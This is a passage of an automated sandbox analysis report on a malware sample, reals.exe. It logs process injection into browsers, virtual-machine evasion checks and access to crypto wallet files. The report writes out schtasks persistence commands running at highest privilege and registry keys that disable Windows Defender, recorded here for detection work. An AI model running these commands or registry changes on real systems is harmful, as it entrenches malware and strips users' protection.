parent_process	chrome.exe	martian_process	"C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1156,4823404497628349871,4316939967193129537,131072 --gpu-preferences=KAAAAAAAAAAABwAAAQAAAAAAAAAAAGAAAQAAAAAAAAAIAAAAAAAAACgAAAAEAAAAIAAAAAAAAAAoAAAAAAAAADAAAAAAAAAAOAAAAAAAAAAQAAAAAAAAAAAAAAAKAAAAEAAAAAAAAAAAAAAACwAAABAAAAAAAAAAAQAAAAoAAAAQAAAAAAAAAAEAAAALAAAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x80ee --gpu-device-id=0xbeef --gpu-driver-vendor=Microsoft --gpu-driver-version=6.1.7600.16385 --gpu-driver-date=6-21-2006 --service-request-channel-token=5B7F673043613A1ABAE29A68FC1752A9 --mojo-platform-channel-handle=1192 --ignored=" --type=renderer " /prefetch:2
parent_process	firefox.exe	martian_process	"C:\Program Files\Mozilla Firefox\firefox.exe" https://www.facebook.com/video

Found URLs in memory pointing to an IP address rather than a domain (potentially indicative of Command & Control traffic) (1 event)

url	http://127.0.0.1

Appends a known multi-family ransomware file extension to files that have been encrypted (4 events)

file	C:\Users\test22\AppData\Roaming\Exodus\exodus.wallet
file	C:\Users\test22\AppData\Roaming\MultiDoge\multidoge.wallet
file	C:\Users\test22\AppData\Roaming\Mozilla\Firefox\Profiles\qxo5wa6x.default-release\parent.lock
file	C:\Users\test22\AppData\Local\Temp\firefox\parent.lock

Resumed a suspended thread in a remote process potentially indicative of process injection (50 out of 55 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 2108 resumed a thread in remote process 1156
Process injection	Process 2108 resumed a thread in remote process 2272
Process injection	Process 2108 resumed a thread in remote process 3172
Process injection	Process 2108 resumed a thread in remote process 3472
Process injection	Process 2108 resumed a thread in remote process 3836
Process injection	Process 2108 resumed a thread in remote process 772
Process injection	Process 2992 resumed a thread in remote process 3060
Process injection	Process 2192 resumed a thread in remote process 3060
Process injection	Process 3472 resumed a thread in remote process 3952
NtResumeThread Feb. 20, 2024, 7:52 a.m.	thread_handle: 0x000002c8 suspend_count: 1 process_identifier: 1156	1	0	0
NtResumeThread Feb. 20, 2024, 7:52 a.m.	thread_handle: 0x000002c8 suspend_count: 1 process_identifier: 2272	1	0	0
NtResumeThread Feb. 20, 2024, 7:52 a.m.	thread_handle: 0x000002c8 suspend_count: 1 process_identifier: 3172	1	0	0
NtResumeThread Feb. 20, 2024, 7:52 a.m.	thread_handle: 0x00000138 suspend_count: 1 process_identifier: 3472	1	0	0
NtResumeThread Feb. 20, 2024, 7:52 a.m.	thread_handle: 0x000001b0 suspend_count: 1 process_identifier: 3836	1	0	0
NtResumeThread Feb. 20, 2024, 7:52 a.m.	thread_handle: 0x00000294 suspend_count: 1 process_identifier: 772	1	0	0
NtResumeThread Feb. 20, 2024, 7:52 a.m.	thread_handle: 0x000002a4 suspend_count: 1 process_identifier: 3060	1	0	0
NtResumeThread Feb. 20, 2024, 7:52 a.m.	thread_handle: 0x0000000000000154 suspend_count: 2 process_identifier: 3060	1	0	0
NtResumeThread Feb. 20, 2024, 7:52 a.m.	thread_handle: 0x0000000000000154 suspend_count: 2 process_identifier: 3060	1	0	0
NtResumeThread Feb. 20, 2024, 7:52 a.m.	thread_handle: 0x0000000000000154 suspend_count: 2 process_identifier: 3060	1	0	0
NtResumeThread Feb. 20, 2024, 7:52 a.m.	thread_handle: 0x0000000000000154 suspend_count: 2 process_identifier: 3060	1	0	0
NtResumeThread Feb. 20, 2024, 7:52 a.m.	thread_handle: 0x0000000000000154 suspend_count: 2 process_identifier: 3060	1	0	0
NtResumeThread Feb. 20, 2024, 7:52 a.m.	thread_handle: 0x0000000000000154 suspend_count: 2 process_identifier: 3060	1	0	0
NtResumeThread Feb. 20, 2024, 7:52 a.m.	thread_handle: 0x0000000000000154 suspend_count: 2 process_identifier: 3060	1	0	0
NtResumeThread Feb. 20, 2024, 7:52 a.m.	thread_handle: 0x0000000000000154 suspend_count: 2 process_identifier: 3060	1	0	0
NtResumeThread Feb. 20, 2024, 7:52 a.m.	thread_handle: 0x0000000000000154 suspend_count: 2 process_identifier: 3060	1	0	0
NtResumeThread Feb. 20, 2024, 7:52 a.m.	thread_handle: 0x0000000000000154 suspend_count: 2 process_identifier: 3060	1	0	0
NtResumeThread Feb. 20, 2024, 7:52 a.m.	thread_handle: 0x0000000000000154 suspend_count: 2 process_identifier: 3060	1	0	0
NtResumeThread Feb. 20, 2024, 7:52 a.m.	thread_handle: 0x0000000000000154 suspend_count: 2 process_identifier: 3060	1	0	0
NtResumeThread Feb. 20, 2024, 7:52 a.m.	thread_handle: 0x0000000000000154 suspend_count: 2 process_identifier: 3060	1	0	0
NtResumeThread Feb. 20, 2024, 7:52 a.m.	thread_handle: 0x0000000000000154 suspend_count: 2 process_identifier: 3060	1	0	0
NtResumeThread Feb. 20, 2024, 7:52 a.m.	thread_handle: 0x0000000000000154 suspend_count: 2 process_identifier: 3060	1	0	0
NtResumeThread Feb. 20, 2024, 7:52 a.m.	thread_handle: 0x0000000000000154 suspend_count: 2 process_identifier: 3060	1	0	0
NtResumeThread Feb. 20, 2024, 7:52 a.m.	thread_handle: 0x0000000000000154 suspend_count: 2 process_identifier: 3060	1	0	0
NtResumeThread Feb. 20, 2024, 7:52 a.m.	thread_handle: 0x0000000000000154 suspend_count: 2 process_identifier: 3060	1	0	0
NtResumeThread Feb. 20, 2024, 7:52 a.m.	thread_handle: 0x0000000000000154 suspend_count: 2 process_identifier: 3060	1	0	0
NtResumeThread Feb. 20, 2024, 7:52 a.m.	thread_handle: 0x0000000000000154 suspend_count: 2 process_identifier: 3060	1	0	0
NtResumeThread Feb. 20, 2024, 7:52 a.m.	thread_handle: 0x0000000000000154 suspend_count: 2 process_identifier: 3060	1	0	0
NtResumeThread Feb. 20, 2024, 7:52 a.m.	thread_handle: 0x0000000000000154 suspend_count: 2 process_identifier: 3060	1	0	0
NtResumeThread Feb. 20, 2024, 7:52 a.m.	thread_handle: 0x0000000000000154 suspend_count: 2 process_identifier: 3060	1	0	0
NtResumeThread Feb. 20, 2024, 7:52 a.m.	thread_handle: 0x0000000000000154 suspend_count: 2 process_identifier: 3060	1	0	0
NtResumeThread Feb. 20, 2024, 7:52 a.m.	thread_handle: 0x0000000000000154 suspend_count: 2 process_identifier: 3060	1	0	0
NtResumeThread Feb. 20, 2024, 7:52 a.m.	thread_handle: 0x0000000000000154 suspend_count: 2 process_identifier: 3060	1	0	0
NtResumeThread Feb. 20, 2024, 7:53 a.m.	thread_handle: 0x0000000000000154 suspend_count: 2 process_identifier: 3060	1	0	0
NtResumeThread Feb. 20, 2024, 7:53 a.m.	thread_handle: 0x0000000000000154 suspend_count: 2 process_identifier: 3060	1	0	0
NtResumeThread Feb. 20, 2024, 7:53 a.m.	thread_handle: 0x0000000000000154 suspend_count: 2 process_identifier: 3060	1	0	0
NtResumeThread Feb. 20, 2024, 7:53 a.m.	thread_handle: 0x0000000000000154 suspend_count: 2 process_identifier: 3060	1	0	0
NtResumeThread Feb. 20, 2024, 7:53 a.m.	thread_handle: 0x0000000000000154 suspend_count: 2 process_identifier: 3060	1	0	0
NtResumeThread Feb. 20, 2024, 7:53 a.m.	thread_handle: 0x0000000000000154 suspend_count: 2 process_identifier: 3060	1	0	0
NtResumeThread Feb. 20, 2024, 7:53 a.m.	thread_handle: 0x0000000000000154 suspend_count: 2 process_identifier: 3060	1	0	0
NtResumeThread Feb. 20, 2024, 7:53 a.m.	thread_handle: 0x0000000000000154 suspend_count: 2 process_identifier: 3060	1	0	0

Uses Sysinternals tools in order to add additional command line functionality (4 events)

cmdline	schtasks /create /f /RU "test22" /tr "C:\ProgramData\MSIUpdaterV131\MSIUpdaterV131.exe" /tn "MSIUpdaterV131 LG" /sc ONLOGON /rl HIGHEST
cmdline	schtasks /create /f /RU "test22" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 HR" /sc HOURLY /rl HIGHEST
cmdline	schtasks /create /f /RU "test22" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 LG" /sc ONLOGON /rl HIGHEST
cmdline	schtasks /create /f /RU "test22" /tr "C:\ProgramData\MSIUpdaterV131\MSIUpdaterV131.exe" /tn "MSIUpdaterV131 HR" /sc HOURLY /rl HIGHEST

Detects VirtualBox through the presence of a registry key (1 event)

registry

HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__

Detects VMWare through the in instruction feature (1 event)

Time & API	Arguments	Status	Return	Repeated
__exception__ Feb. 20, 2024, 7:51 a.m.	stacktrace: exception.instruction_r: ed 64 8f 05 00 00 00 00 81 ec 04 00 00 00 89 2c exception.symbol: reals+0x2e5c33 exception.instruction: in eax, dx exception.module: reals.exe exception.exception_code: 0xc0000096 exception.offset: 3038259 exception.address: 0xe35c33 registers.esp: 2095136 registers.edi: 1114345 registers.eax: 1447909480 registers.ebp: 4003242004 registers.edx: 22104 registers.ebx: 1969033397 registers.esi: 14879463 registers.ecx: 20	1	0	0

Detects the presence of Wine emulator (1 event)

registry

HKEY_CURRENT_USER\Software\Wine

Disables Windows Security features (6 events)

description	attempts to modify windows defender policies	registry	HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection
description	attempts to modify windows defender policies	registry	HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable
description	attempts to modify windows defender policies	registry	HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring
description	attempts to modify windows defender policies	registry	HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware
description	attempts to modify windows defender policies	registry	HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring
description	attempts to modify windows defender policies	registry	HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection

Executed a process and injected code into it, probably while unpacking (50 out of 178 events)

Time & API	Arguments	Status	Return
CreateProcessInternalW Feb. 20, 2024, 7:51 a.m.	thread_identifier: 2764 thread_handle: 0x000001a0 process_identifier: 2760 current_directory: filepath: track: 1 command_line: schtasks /create /f /RU "test22" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 HR" /sc HOURLY /rl HIGHEST filepath_r: stack_pivoted: 0 creation_flags: 134217728 (CREATE_NO_WINDOW) inherit_handles: 0 process_handle: 0x000001a4	1	1
CreateProcessInternalW Feb. 20, 2024, 7:51 a.m.	thread_identifier: 2848 thread_handle: 0x000001ac process_identifier: 2844 current_directory: filepath: track: 1 command_line: schtasks /create /f /RU "test22" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 LG" /sc ONLOGON /rl HIGHEST filepath_r: stack_pivoted: 0 creation_flags: 134217728 (CREATE_NO_WINDOW) inherit_handles: 0 process_handle: 0x000001a8	1	1
NtResumeThread Feb. 20, 2024, 7:51 a.m.	thread_handle: 0x00000224 suspend_count: 1 process_identifier: 2540	1	0
CreateProcessInternalW Feb. 20, 2024, 7:51 a.m.	thread_identifier: 3020 thread_handle: 0x0000061c process_identifier: 3016 current_directory: filepath: track: 1 command_line: schtasks /create /f /RU "test22" /tr "C:\ProgramData\MSIUpdaterV131\MSIUpdaterV131.exe" /tn "MSIUpdaterV131 HR" /sc HOURLY /rl HIGHEST filepath_r: stack_pivoted: 0 creation_flags: 134217728 (CREATE_NO_WINDOW) inherit_handles: 0 process_handle: 0x00000624	1	1
CreateProcessInternalW Feb. 20, 2024, 7:51 a.m.	thread_identifier: 1216 thread_handle: 0x00000628 process_identifier: 744 current_directory: filepath: track: 1 command_line: schtasks /create /f /RU "test22" /tr "C:\ProgramData\MSIUpdaterV131\MSIUpdaterV131.exe" /tn "MSIUpdaterV131 LG" /sc ONLOGON /rl HIGHEST filepath_r: stack_pivoted: 0 creation_flags: 134217728 (CREATE_NO_WINDOW) inherit_handles: 0 process_handle: 0x00000620	1	1
CreateProcessInternalW Feb. 20, 2024, 7:51 a.m.	thread_identifier: 2100 thread_handle: 0x00000730 process_identifier: 2108 current_directory: C:\Users\test22\AppData\Local\Temp\heidigqzjATjkZOIO filepath: C:\Users\test22\AppData\Local\Temp\heidigqzjATjkZOIO\lAJtUcYyKh8w3igUMaur.exe track: 1 command_line: "C:\Users\test22\AppData\Local\Temp\heidigqzjATjkZOIO\lAJtUcYyKh8w3igUMaur.exe" filepath_r: C:\Users\test22\AppData\Local\Temp\heidigqzjATjkZOIO\lAJtUcYyKh8w3igUMaur.exe stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x00000734	1	1
CreateProcessInternalW Feb. 20, 2024, 7:51 a.m.	thread_identifier: 2808 thread_handle: 0x00000730 process_identifier: 2816 current_directory: C:\Users\test22\AppData\Local\Temp\heidigqzjATjkZOIO filepath: C:\Users\test22\AppData\Local\Temp\heidigqzjATjkZOIO\f37pbXDbFY0Z2LnYvlpz.exe track: 1 command_line: "C:\Users\test22\AppData\Local\Temp\heidigqzjATjkZOIO\f37pbXDbFY0Z2LnYvlpz.exe" filepath_r: C:\Users\test22\AppData\Local\Temp\heidigqzjATjkZOIO\f37pbXDbFY0Z2LnYvlpz.exe stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x0000072c	1	1
CreateProcessInternalW Feb. 20, 2024, 7:52 a.m.	thread_identifier: 1812 thread_handle: 0x00000730 process_identifier: 1892 current_directory: C:\Users\test22\AppData\Local\Temp\heidigqzjATjkZOIO filepath: C:\Users\test22\AppData\Local\Temp\heidigqzjATjkZOIO\89S7AqN8sq8AdM4Oot2T.exe track: 1 command_line: "C:\Users\test22\AppData\Local\Temp\heidigqzjATjkZOIO\89S7AqN8sq8AdM4Oot2T.exe" filepath_r: C:\Users\test22\AppData\Local\Temp\heidigqzjATjkZOIO\89S7AqN8sq8AdM4Oot2T.exe stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x00000738	1	1
CreateProcessInternalW Feb. 20, 2024, 7:52 a.m.	thread_identifier: 2996 thread_handle: 0x0000072c process_identifier: 2992 current_directory: C:\Users\test22\AppData\Local\Temp\heidigqzjATjkZOIO filepath: C:\Users\test22\AppData\Local\Temp\heidigqzjATjkZOIO\qGDDcS3d5pQc8FHSfMi3.exe track: 1 command_line: "C:\Users\test22\AppData\Local\Temp\heidigqzjATjkZOIO\qGDDcS3d5pQc8FHSfMi3.exe" filepath_r: C:\Users\test22\AppData\Local\Temp\heidigqzjATjkZOIO\qGDDcS3d5pQc8FHSfMi3.exe stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x00000740	1	1
CreateProcessInternalW Feb. 20, 2024, 7:52 a.m.	thread_identifier: 2000 thread_handle: 0x00000730 process_identifier: 936 current_directory: C:\Users\test22\AppData\Local\Temp\heidigqzjATjkZOIO filepath: C:\Users\test22\AppData\Local\Temp\heidigqzjATjkZOIO\DOepsJkkm0E916Tb0AAa.exe track: 1 command_line: "C:\Users\test22\AppData\Local\Temp\heidigqzjATjkZOIO\DOepsJkkm0E916Tb0AAa.exe" filepath_r: C:\Users\test22\AppData\Local\Temp\heidigqzjATjkZOIO\DOepsJkkm0E916Tb0AAa.exe stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x0000073c	1	1
CreateProcessInternalW Feb. 20, 2024, 7:51 a.m.	thread_identifier: 148 thread_handle: 0x000001cc process_identifier: 2172 current_directory: C:\Users\test22\AppData\Local\Temp\heidigqzjATjkZOIO filepath: C:\Program Files (x86)\Internet Explorer\iexplore.exe track: 1 command_line: "C:\Program Files (x86)\Internet Explorer\iexplore.exe" -nohome filepath_r: C:\Program Files (x86)\Internet Explorer\iexplore.exe stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x000001c8	1	1
NtResumeThread Feb. 20, 2024, 7:51 a.m.	thread_handle: 0x00000264 suspend_count: 1 process_identifier: 2108	1	0
CreateProcessInternalW Feb. 20, 2024, 7:52 a.m.	thread_identifier: 916 thread_handle: 0x000002c8 process_identifier: 1156 current_directory: C:\Users\test22\AppData\Local\Temp\heidigqzjATjkZOIO filepath: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe track: 1 command_line: "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" https://www.youtube.com filepath_r: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe stack_pivoted: 0 creation_flags: 67634196 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_SUSPENDED\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x000002d4	1	1
NtResumeThread Feb. 20, 2024, 7:52 a.m.	thread_handle: 0x000002c8 suspend_count: 1 process_identifier: 1156	1	0
CreateProcessInternalW Feb. 20, 2024, 7:52 a.m.	thread_identifier: 2276 thread_handle: 0x000002c8 process_identifier: 2272 current_directory: C:\Users\test22\AppData\Local\Temp\heidigqzjATjkZOIO filepath: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe track: 1 command_line: "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" https://www.facebook.com/video filepath_r: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe stack_pivoted: 0 creation_flags: 67634196 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_SUSPENDED\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x000002b0	1	1
NtResumeThread Feb. 20, 2024, 7:52 a.m.	thread_handle: 0x000002c8 suspend_count: 1 process_identifier: 2272	1	0
CreateProcessInternalW Feb. 20, 2024, 7:52 a.m.	thread_identifier: 3192 thread_handle: 0x000002c8 process_identifier: 3172 current_directory: C:\Users\test22\AppData\Local\Temp\heidigqzjATjkZOIO filepath: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe track: 1 command_line: "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" https://accounts.google.com filepath_r: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe stack_pivoted: 0 creation_flags: 67634196 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_SUSPENDED\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x00000218	1	1
NtResumeThread Feb. 20, 2024, 7:52 a.m.	thread_handle: 0x000002c8 suspend_count: 1 process_identifier: 3172	1	0
CreateProcessInternalW Feb. 20, 2024, 7:52 a.m.	thread_identifier: 3464 thread_handle: 0x00000138 process_identifier: 3472 current_directory: C:\Users\test22\AppData\Local\Temp\heidigqzjATjkZOIO filepath: C:\Program Files\Mozilla Firefox\firefox.exe track: 1 command_line: "C:\Program Files\Mozilla Firefox\firefox.exe" https://www.youtube.com filepath_r: C:\Program Files\Mozilla Firefox\firefox.exe stack_pivoted: 0 creation_flags: 67634196 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_SUSPENDED\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x000002dc	1	1
NtResumeThread Feb. 20, 2024, 7:52 a.m.	thread_handle: 0x00000138 suspend_count: 1 process_identifier: 3472	1	0
CreateProcessInternalW Feb. 20, 2024, 7:52 a.m.	thread_identifier: 3900 thread_handle: 0x000001b0 process_identifier: 3836 current_directory: C:\Users\test22\AppData\Local\Temp\heidigqzjATjkZOIO filepath: C:\Program Files\Mozilla Firefox\firefox.exe track: 1 command_line: "C:\Program Files\Mozilla Firefox\firefox.exe" https://www.facebook.com/video filepath_r: C:\Program Files\Mozilla Firefox\firefox.exe stack_pivoted: 0 creation_flags: 67634196 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_SUSPENDED\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x000002e8	1	1
NtResumeThread Feb. 20, 2024, 7:52 a.m.	thread_handle: 0x000001b0 suspend_count: 1 process_identifier: 3836	1	0
CreateProcessInternalW Feb. 20, 2024, 7:52 a.m.	thread_identifier: 2900 thread_handle: 0x00000294 process_identifier: 772 current_directory: C:\Users\test22\AppData\Local\Temp\heidigqzjATjkZOIO filepath: C:\Program Files\Mozilla Firefox\firefox.exe track: 1 command_line: "C:\Program Files\Mozilla Firefox\firefox.exe" https://accounts.google.com filepath_r: C:\Program Files\Mozilla Firefox\firefox.exe stack_pivoted: 0 creation_flags: 67634196 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_SUSPENDED\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x000002e8	1	1
NtResumeThread Feb. 20, 2024, 7:52 a.m.	thread_handle: 0x00000294 suspend_count: 1 process_identifier: 772	1	0
NtResumeThread Feb. 20, 2024, 7:52 a.m.	thread_handle: 0x000001d4 suspend_count: 1 process_identifier: 2816	1	0
NtResumeThread Feb. 20, 2024, 7:52 a.m.	thread_handle: 0x00000244 suspend_count: 1 process_identifier: 2816	1	0
NtResumeThread Feb. 20, 2024, 7:52 a.m.	thread_handle: 0x00000284 suspend_count: 1 process_identifier: 2816	1	0
NtResumeThread Feb. 20, 2024, 7:52 a.m.	thread_handle: 0x00000130 suspend_count: 1 process_identifier: 1892	1	0
NtResumeThread Feb. 20, 2024, 7:52 a.m.	thread_handle: 0x000001ac suspend_count: 1 process_identifier: 1892	1	0
NtResumeThread Feb. 20, 2024, 7:52 a.m.	thread_handle: 0x00000280 suspend_count: 1 process_identifier: 2992	1	0
CreateProcessInternalW Feb. 20, 2024, 7:52 a.m.	thread_identifier: 604 thread_handle: 0x000002a4 process_identifier: 3060 current_directory: C:\Users\test22\AppData\Local\Temp\heidigqzjATjkZOIO filepath: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe track: 1 command_line: "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" https://accounts.google.com filepath_r: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe stack_pivoted: 0 creation_flags: 67634196 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_SUSPENDED\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x000002ac	1	1
NtResumeThread Feb. 20, 2024, 7:52 a.m.	thread_handle: 0x000002a4 suspend_count: 1 process_identifier: 3060	1	0
CreateProcessInternalW Feb. 20, 2024, 7:52 a.m.	thread_identifier: 2180 thread_handle: 0x0000000000000098 process_identifier: 2192 current_directory: filepath: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe track: 1 command_line: "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\test22\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\test22\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\test22\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=65.0.3325.181 --initial-client-data=0x88,0x8c,0x90,0x84,0x94,0x7fef3e8f1e8,0x7fef3e8f1f8,0x7fef3e8f208 filepath_r: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe stack_pivoted: 0 creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 1 process_handle: 0x000000000000009c	1	1
CreateProcessInternalW Feb. 20, 2024, 7:52 a.m.	thread_identifier: 2748 thread_handle: 0x0000000000000144 process_identifier: 1332 current_directory: filepath: track: 1 command_line: "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=watcher --main-thread-id=604 --on-initialized-event-handle=316 --parent-handle=320 /prefetch:6 filepath_r: stack_pivoted: 0 creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 1 process_handle: 0x0000000000000148	1	1
NtResumeThread Feb. 20, 2024, 7:52 a.m.	thread_handle: 0x0000000000000214 suspend_count: 1 process_identifier: 3060	1	0
CreateProcessInternalW Feb. 20, 2024, 7:52 a.m.	thread_identifier: 3164 thread_handle: 0x00000000000005a4 process_identifier: 3160 current_directory: filepath: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe track: 1 command_line: "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1156,4823404497628349871,4316939967193129537,131072 --gpu-preferences=KAAAAAAAAAAABwAAAQAAAAAAAAAAAGAAAQAAAAAAAAAIAAAAAAAAACgAAAAEAAAAIAAAAAAAAAAoAAAAAAAAADAAAAAAAAAAOAAAAAAAAAAQAAAAAAAAAAAAAAAKAAAAEAAAAAAAAAAAAAAACwAAABAAAAAAAAAAAQAAAAoAAAAQAAAAAAAAAAEAAAALAAAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x80ee --gpu-device-id=0xbeef --gpu-driver-vendor=Microsoft --gpu-driver-version=6.1.7600.16385 --gpu-driver-date=6-21-2006 --service-request-channel-token=5B7F673043613A1ABAE29A68FC1752A9 --mojo-platform-channel-handle=1192 --ignored=" --type=renderer " /prefetch:2 filepath_r: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe stack_pivoted: 0 creation_flags: 17302540 (CREATE_BREAKAWAY_FROM_JOB\|CREATE_SUSPENDED\|CREATE_UNICODE_ENVIRONMENT\|DETACHED_PROCESS\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 1 process_handle: 0x00000000000005a8	1	1
NtResumeThread Feb. 20, 2024, 7:52 a.m.	thread_handle: 0x00000000000000e0 suspend_count: 1 process_identifier: 2192	1	0
NtGetContextThread Feb. 20, 2024, 7:52 a.m.	thread_handle: 0x0000000000000154	1	0
NtResumeThread Feb. 20, 2024, 7:52 a.m.	thread_handle: 0x0000000000000154 suspend_count: 2 process_identifier: 3060	1	0
NtGetContextThread Feb. 20, 2024, 7:52 a.m.	thread_handle: 0x0000000000000154	1	0
NtResumeThread Feb. 20, 2024, 7:52 a.m.	thread_handle: 0x0000000000000154 suspend_count: 2 process_identifier: 3060	1	0
NtGetContextThread Feb. 20, 2024, 7:52 a.m.	thread_handle: 0x0000000000000154	1	0
NtResumeThread Feb. 20, 2024, 7:52 a.m.	thread_handle: 0x0000000000000154 suspend_count: 2 process_identifier: 3060	1	0
NtGetContextThread Feb. 20, 2024, 7:52 a.m.	thread_handle: 0x0000000000000154	1	0
NtResumeThread Feb. 20, 2024, 7:52 a.m.	thread_handle: 0x0000000000000154 suspend_count: 2 process_identifier: 3060	1	0
NtGetContextThread Feb. 20, 2024, 7:52 a.m.	thread_handle: 0x0000000000000154	1	0
NtResumeThread Feb. 20, 2024, 7:52 a.m.	thread_handle: 0x0000000000000154 suspend_count: 2 process_identifier: 3060	1	0
NtGetContextThread Feb. 20, 2024, 7:52 a.m.	thread_handle: 0x0000000000000154	1	0
NtResumeThread Feb. 20, 2024, 7:52 a.m.	thread_handle: 0x0000000000000154 suspend_count: 2 process_identifier: 3060	1	0
NtGetContextThread Feb. 20, 2024, 7:52 a.m.	thread_handle: 0x0000000000000154	1	0

reals.exe

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All